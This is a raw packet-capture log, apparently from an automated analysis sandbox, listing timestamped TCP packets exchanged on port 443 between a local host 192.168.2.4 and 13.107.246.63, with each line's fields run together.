                                                                                                                                                                                                            Nov 22, 2024 04:27:50.653498888 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.653987885 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.654038906 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.654438972 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.654452085 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.733761072 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.734265089 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.734311104 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.734741926 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.734746933 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.980607986 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.983654022 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.983724117 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.983755112 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.983786106 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.983841896 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.983928919 CET49963443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.983949900 CET4434996313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.989818096 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.989877939 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.989953995 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.990562916 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:50.990586996 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.093070030 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.096191883 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.096342087 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.096503019 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.096503019 CET49965443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.096522093 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.096532106 CET4434996513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.100286961 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.100332022 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.100392103 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.100656986 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.100671053 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.187441111 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.190315008 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.190380096 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.190443993 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.190459013 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.190475941 CET49964443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.190480947 CET4434996413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.193320036 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.193344116 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.193422079 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.193548918 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.193562031 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.204385996 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.204790115 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.204833031 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.205215931 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.205230951 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.222896099 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.223304987 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.223318100 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.223613977 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.223618031 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.639440060 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.642550945 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.642611027 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.642782927 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.642782927 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.642962933 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.643012047 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.643074989 CET49967443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.643091917 CET4434996713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.645562887 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.645598888 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.646365881 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.646507978 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.646516085 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.674943924 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.678425074 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.680377007 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.680813074 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.680851936 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.680880070 CET49966443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.680896044 CET4434996613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.683413982 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.683470964 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.684140921 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.684329033 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:51.684357882 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:52.715660095 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:52.718837023 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:52.718866110 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:52.719283104 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:52.719291925 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:52.879172087 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:52.889364004 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:52.889417887 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:52.897116899 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:52.897144079 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.414541006 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.415098906 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.415111065 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.415575981 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.415580988 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.619402885 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.622456074 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.622545958 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.622601986 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.622621059 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.622634888 CET49969443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.622641087 CET4434996913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.625555038 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.625646114 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.625772953 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.625937939 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.625961065 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.634583950 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.638226032 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.638286114 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.638308048 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.638346910 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.638394117 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.638398886 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.638408899 CET49970443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.638411999 CET4434997013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.640671015 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.640702009 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.640785933 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.640927076 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.640938044 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.831747055 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.832362890 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.832438946 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.832854033 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.832870007 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.858869076 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.861922979 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.862010002 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.862044096 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.862052917 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.862065077 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.862070084 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.864811897 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.864825010 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.864892960 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.865020037 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.865035057 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.938596010 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.940056086 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.940078974 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.940546989 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:53.940552950 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.275755882 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.278842926 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.278897047 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.278902054 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.278954983 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.279019117 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.279040098 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.279053926 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.279059887 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.282110929 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.282151937 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.282218933 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.282352924 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.282366991 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.381700993 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.385040998 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.385137081 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.385195017 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.385195017 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.385226965 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.385250092 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.387815952 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.387851000 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.387939930 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.388077021 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:54.388092995 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.359987020 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.360965967 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.360991955 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.361449957 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.361458063 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.414144039 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.414985895 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.415034056 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.415410042 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.415421009 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.601653099 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.602447987 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.602458000 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.602915049 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.602920055 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.811167955 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.811348915 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.811517000 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.811712027 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.811748981 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.811775923 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.811793089 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.815236092 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.815299988 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.815388918 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.815594912 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.815608025 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.858751059 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.861788988 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.861845016 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.861912966 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.861953974 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.862004042 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.862030983 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.862046003 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.862052917 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.865101099 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.865144014 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.865241051 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.865416050 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:55.865453005 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.006968975 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.008188963 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.008217096 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.008707047 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.008713007 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.035250902 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.038453102 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.038501024 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.038506031 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.038557053 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.052361965 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.052396059 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.052412987 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.052421093 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.074198961 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.074218988 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.074296951 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.074512005 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.074522972 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.191135883 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.191705942 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.191723108 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.192202091 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.192209005 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.445024014 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.448049068 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.448142052 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.448182106 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.448198080 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.448208094 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.448214054 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.451478004 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.451519012 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.451606035 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.451739073 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.451754093 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.634524107 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.637622118 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.637703896 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.637768030 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.637794971 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.637820005 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.637830019 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.641200066 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.641236067 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.641335964 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.641519070 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:56.641526937 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:57.608148098 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:57.608836889 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:57.608865023 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:57.609365940 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:57.609371901 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:57.626085997 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:57.626533985 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:57.626568079 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:57.627118111 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:57.627124071 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.042450905 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.045469046 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.045532942 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.045557976 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.045591116 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.045650959 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.048913002 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.048928022 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.048950911 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.048957109 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.053252935 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.053296089 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.053369045 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                            Nov 22, 2024 04:27:58.053546906 CET49984443192.168.2.413.107.246.63
